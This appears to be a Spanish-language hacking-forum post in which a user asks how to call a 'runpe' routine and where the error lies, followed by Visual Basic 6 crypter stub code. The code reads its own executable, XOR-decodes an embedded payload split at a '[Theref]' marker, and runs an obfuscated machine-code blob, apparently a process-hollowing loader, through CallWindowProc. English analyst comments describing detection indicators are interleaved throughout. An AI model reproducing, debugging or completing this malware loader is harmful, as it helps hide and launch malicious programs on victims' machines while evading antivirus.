
Temas - mirkosenior

#1
Dudas Generales / ayuda con llamar runpe
6 Junio 2014, 12:06 PM
hola a todos

¿Cómo puedo llamar a este runpe?

¿Alguien puede decirme dónde está el error?

' Entry point of what reads as a crypter-style stub: it loads its own
' executable file from disk, cuts it at a text marker, decodes one of the
' pieces and passes the result to a loader routine.
'
' File layout implied by the Split indices used below:
'   <stub image> [Theref] <encoded payload> [Theref] <key>
'
' Analyst notes:
'   - The literal marker "[Theref]" inside an executable, followed by trailing
'     data, is a static indicator for this stub.
'   - The key is read from the same file as the payload, so the payload can be
'     recovered offline from a sample without running it.
'   - A process that opens its own image for reading and then transfers control
'     to a decoded buffer is a behavioural indicator worth alerting on.
Sub Main()

' Full path of the running executable, built from App.Path and App.EXEName.
Dim AAAA As String

AAAA = App.Path & "\" & App.EXEName & ".exe"

' Receives the whole file content as a VB string.
Dim BBBB As String

Open AAAA For Binary As #1

' Pre-size the buffer to the file length so that Get reads the entire file.
BBBB = Space(LOF(1))

Get #1, , BBBB

Close #1

Dim sData() As String

' Element 0 is everything before the first marker, element 1 the text between
' the first and second marker, element 2 the text after the second marker.
sData() = Split(BBBB, "[Theref]")

' Decode element 1 using element 2 as the key. The routine is labelled RC4 in
' this listing, but its body is a repeating-key XOR.
sData(1) = ¥¶V«baDJØǬpRÆRQSgfâdãqG(sData(1), sData(2))

' Passes the decoded buffer, plus this executable's own path converted with
' vbFromUnicode, to a routine named runpe.
Call runpe(sData(1), StrConv(App.Path + "\" + App.EXEName + ".exe", vbFromUnicode))

End Sub

'RC4

' Repeating-key XOR over a string. The listing labels this routine RC4, but
' there is no key schedule and no keystream generation: every data byte is
' XORed directly with a key byte, and the key index wraps back to 0 once it
' passes the last key byte.
'
' Parameters (identifiers are obfuscated):
'   1st - the data string to transform
'   2nd - the key string
' Returns: the transformed bytes converted back to a string with vbUnicode.
' XOR is its own inverse, so the same call both encodes and decodes.
'
' Analyst note: a repeating-key XOR offers no real confidentiality. Given the
' key, or a stretch of known plaintext at least as long as the key, the data
' is recovered directly, which makes static unpacking of samples feasible.
Function ¥¶V«baDJØǬpRÆRQSgfâdãqG(qqJ¥e_BpX_YC¼sd¢êMGꩪj¤ó¦®ãIh As String, b®yqªÇ¤A¬d¥i¢xzlt¥Nuãªa¤WjMAIc As String) As String
' Key bytes.
Dim DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj() As Byte
' Data bytes, transformed in place.
Dim WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E() As Byte
' Index into the data bytes.
Dim ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ As Long
' Index into the key bytes.
Dim úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® As Long
' Upper bound of the data bytes.
Dim YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ As Long
' Upper bound of the key bytes.
Dim ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã As Long
' Convert both strings to byte arrays (vbFromUnicode).
WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E() = StrConv(qqJ¥e_BpX_YC¼sd¢êMGꩪj¤ó¦®ãIh, vbFromUnicode)
DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj() = StrConv(b®yqªÇ¤A¬d¥i¢xzlt¥Nuãªa¤WjMAIc, vbFromUnicode)
YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ = UBound(WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E)
ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã = UBound(DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj)
' Walk every data byte; both indices start at 0.
Do Until ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ > YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ
' data(i) = data(i) Xor key(k)
WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E(ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ) = WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E(ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ) Xor DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj(úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY®)
' Advance the key index and wrap to 0 after the last key byte.
úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® = úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® + 1
If úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® > ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã Then úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® = 0
ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ = ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ + 1
Loop
' Release the key bytes, return the result as a string, release the data bytes.
Erase DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj
¥¶V«baDJØǬpRÆRQSgfâdãqG = StrConv(WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E, vbUnicode)
Erase WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E
End Function

'RUNPE

Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
' Runs an embedded machine-code blob by abusing CallWindowProc: the address of
' the first element of Asm is passed as lpPrevWndFunc, so the API calls into
' the array contents and hands over the remaining four arguments.
'
' Parameters:
'   data()             - byte array; the address of data(0) is passed as the
'                        second argument (the hWnd slot).
'   Ptr_To_Inject      - passed through unchanged as the third argument.
'   CommandlineEnabled - passed through unchanged as the fourth argument.
' Returns: whatever the CallWindowProc call returns.
'
' NOTE(review): what the blob does with these arguments cannot be read from
' this listing. The parameter names and the 'RUNPE label suggest a
' process-hollowing loader (data = PE image, Ptr_To_Inject = host path), but
' this is unverified. Confirm by disassembling the blob in an isolated
' analysis environment.
'
' Analyst notes:
'   - Asm holds 122 Currency values; VB6 Currency is 8 bytes wide, so the blob
'     is 976 bytes. Storing code as Currency literals keeps it out of ordinary
'     string and byte-array scans.
'   - Static indicators: an import of CallWindowProcA combined with VarPtr on
'     a numeric array, and a long run of large Currency constants.
'   - Presumably this needs the array's memory to be executable, so DEP
'     enforced for the process would be expected to stop the call. Verify on
'     the target configuration.
Private Function eseguiPE(ByRef data() As Byte, ByVal Ptr_To_Inject As Long, ByVal CommandlineEnabled As Long) As Long
' Opaque machine code, 8 bytes per element.
Dim Asm(121) As Currency
Asm(0) = 400681687.6885@
Asm(1) = -476253789078555.0612@
Asm(2) = 169590654935207.5756@
Asm(3) = 850533864474419.4055@
Asm(4) = 737729641913629.2885@
Asm(5) = 241583047782310.0933@
Asm(6) = 24366994722224.3183@
Asm(7) = -5591197446420.7926@
Asm(8) = 909185617598340.8258@
Asm(9) = -19175285449154.725@
Asm(10) = -74963712694652.2037@
Asm(11) = 364813893865675.1812@
Asm(12) = 417268265771289.998@
Asm(13) = -4467533218940.2859@
Asm(14) = 341408918860883.873@
Asm(15) = 24329165641253.0572@
Asm(16) = -704495800380865.7131@
Asm(17) = 374040769202653.0293@
Asm(18) = 132891045878384.5141@
Asm(19) = 330853606455412.8782@
Asm(20) = -18546831736735.2555@
Asm(21) = 319791640719971.9498@
Asm(22) = 908565053235531.3645@
Asm(23) = 204495311115001.8554@
Asm(24) = -854751321242618.2143@
Asm(25) = -74261121419612.3536@
Asm(26) = -853017920184789.9651@
Asm(27) = 853018044985278.6574@
Asm(28) = 11660982868296.5087@
Asm(29) = -644057630032745.1903@
Asm(30) = 389428549114434.7534@
Asm(31) = -76145685875174.3891@
Asm(32) = -74907416031185.4908@
Asm(33) = 494446016607881.1334@
Asm(34) = 373919167982197.785@
Asm(35) = -702326214173594.214@
Asm(36) = 852984839970549.146@
Asm(37) = 878491366656617.7029@
Asm(38) = 11660149244069.3242@
Asm(39) = -644057520081529.9839@
Asm(40) = 852992269963661.735@
Asm(41) = 118191623639287.4757@
Asm(42) = -61508987237432.1588@
Asm(43) = 683482598548397.6903@
Asm(44) = -602576477534616.4219@
Asm(45) = 312616265869225.0362@
Asm(46) = 823209967166017.4093@
Asm(47) = 242250886584983.6374@
Asm(48) = 855453146203670.4029@
Asm(49) = -79066168407783.6283@
Asm(50) = -566073494675362.3812@
Asm(51) = 707480649289074.6628@
Asm(52) = -637454398289603.5604@
Asm(53) = 244386299675628.5445@
Asm(54) = -815078417416403.5827@
Asm(55) = -18879051943875.1995@
Asm(56) = -822123707815930.6686@
Asm(57) = -18434021046527.2954@
Asm(58) = 912451606937402.8942@
Asm(59) = -644057520081529.9756@
Asm(60) = 736754098641473.959@
Asm(61) = 417322719301766.6436@
Asm(62) = 907260734372726.4513@
Asm(63) = 853017967675867.3294@
Asm(64) = 11660982865150.7807@
Asm(65) = -854635987033189.5019@
Asm(66) = 417315068676156.9237@
Asm(67) = -704495800377680.6639@
Asm(68) = 244384539136657.2125@
Asm(69) = -815078417416403.5827@
Asm(70) = 364126617392252.4421@
Asm(71) = 853022663170544.6404@
Asm(72) = -855129000041499.1355@
Asm(73) = 853017946071693.9733@
Asm(74) = 244396803451753.601@
Asm(75) = -535694978088672.9971@
Asm(76) = 853017945341749.0318@
Asm(77) = 850597150951837.7055@
Asm(78) = -693956410164477.1442@
Asm(79) = 392299672072137.6649@
Asm(80) = -75273081301284.3259@
Asm(81) = 233670410612668.8112@
Asm(82) = 232135816315923.5976@
Asm(83) = 282468056240967.6881@
Asm(84) = -701595207746232.5423@
Asm(85) = 173478023424630.523@
Asm(86) = -838890426140287.6832@
Asm(87) = 137505075359453.7978@
Asm(88) = 238303243668856.6869@
Asm(89) = 15754679864024.2693@
Asm(90) = 137137957478099.5152@
Asm(91) = 223974408162476.2226@
Asm(92) = -853018149249239.2854@
Asm(93) = 609147958724062.3211@
Asm(94) = 187716700156924.5176@
Asm(95) = 29051557366465.6234@
Asm(96) = 180486733836584.4849@
Asm(97) = -853018043593043.5209@
Asm(98) = 230703534374533.4347@
Asm(99) = 138151919766295.2044@
Asm(100) = -863941699156868.1112@
Asm(101) = 382501322004887.7562@
Asm(102) = 217671250279223.4602@
Asm(103) = -858396642110759.3865@
Asm(104) = 382501330594822.3482@
Asm(105) = 217671250279223.4602@
Asm(106) = -860029196975681.1913@
Asm(107) = 22128918341666.201@
Asm(108) = 129708668231386.2504@
Asm(109) = 138421474714790.2981@
Asm(110) = 273938087394568.7415@
Asm(111) = -703427576466491.6105@
Asm(112) = 368089803424522.0018@
Asm(113) = 273936330801683.6989@
Asm(114) = -703427576466491.6105@
Asm(115) = 382501322232107.5439@
Asm(116) = 224650062758754.033@
Asm(117) = -802975918546864.1941@
Asm(118) = 261111522452255.6862@
Asm(119) = 35367660677206.1368@
Asm(120) = 848492795353964.3185@
Asm(121) = 5.0164@

'Put Here the shellcode
' Control transfers into the Asm contents here. lParam is fixed at 0, and the
' API's return value becomes this function's result.
eseguiPE = CallWindowProc(VarPtr(Asm(0)), VarPtr(data(0)), Ptr_To_Inject, CommandlineEnabled, 0)
End Function